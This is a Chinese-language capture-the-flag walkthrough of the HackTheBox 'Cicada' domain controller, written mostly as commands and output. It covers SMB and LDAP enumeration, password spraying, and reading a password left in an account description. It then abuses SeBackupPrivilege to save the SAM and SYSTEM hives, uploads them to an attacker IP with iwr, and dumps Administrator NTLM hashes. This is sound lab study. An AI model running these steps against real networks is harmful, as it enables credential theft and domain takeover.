域LDAP枚举-HackTheBox-Cicada
扫端口可以看到 88 389 445 显然是域控
先枚举 SMB smbclient -L //10.10.11.35
可以匿名登录 smbclient //10.10.11.35/HR
泄漏账户默认密码
Cicada$M6Corpb*@Lp#nZp!8
nxc winrm 10.10.11.35
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
再进行匿名域外 LDAP 枚举
impacket-lookupsid cicada/guest@10.10.11.35 -no-pass
[*] Brute forcing SIDs at 10.10.11.35
[*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
kerbrute passwordspray -d cicada -v --dc 10.10.11.35 users.txt 'Cicada$M6Corpb*@Lp#nZp!8'
michael.wrightson`
枚举共享 SYSVOL 拿到一个组策略,里面显示 emily.oscars 可以远程登录(winrm)
实名域外枚举
ldapsearch -H ldap://10.10.11.35 -D "michael.wrightson@cicada.htb" -w 'Cicada$M6Corpb*@Lp#nZp!8' -b "dc=cicada,dc=htb" "(objectClass=user)"
# David Orelious, Users, cicada.htb
dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: David Orelious
sn: Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
回到 SMB 枚举
nxc smb 10.10.11.35 -d cicada -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
DEV 是可读的
smbclient //10.10.11.35/DEV -U cicada/david.orelious%'aRt$Lp#7t*VQ!3'
里面有个 backup 脚本
emily.oscars:Q!3@Lp#M6b*7t*Vt
evil-winrm -i 10.10.11.35 -u cicada.htb\\emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
根据 backup 脚本可以猜测该账户有 backup 权限
whoami /priv 验证确实有 SeBackupPrivilege
reg save hklm\sam c:\windows\temp\sam
reg save hklm\system c:\windows\temp\system
iwr -method put -uri 10.10.16.43/sam -in sam
iwr -method put -uri 10.10.16.43/system -in system
pypykatz registry --sam sam system
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::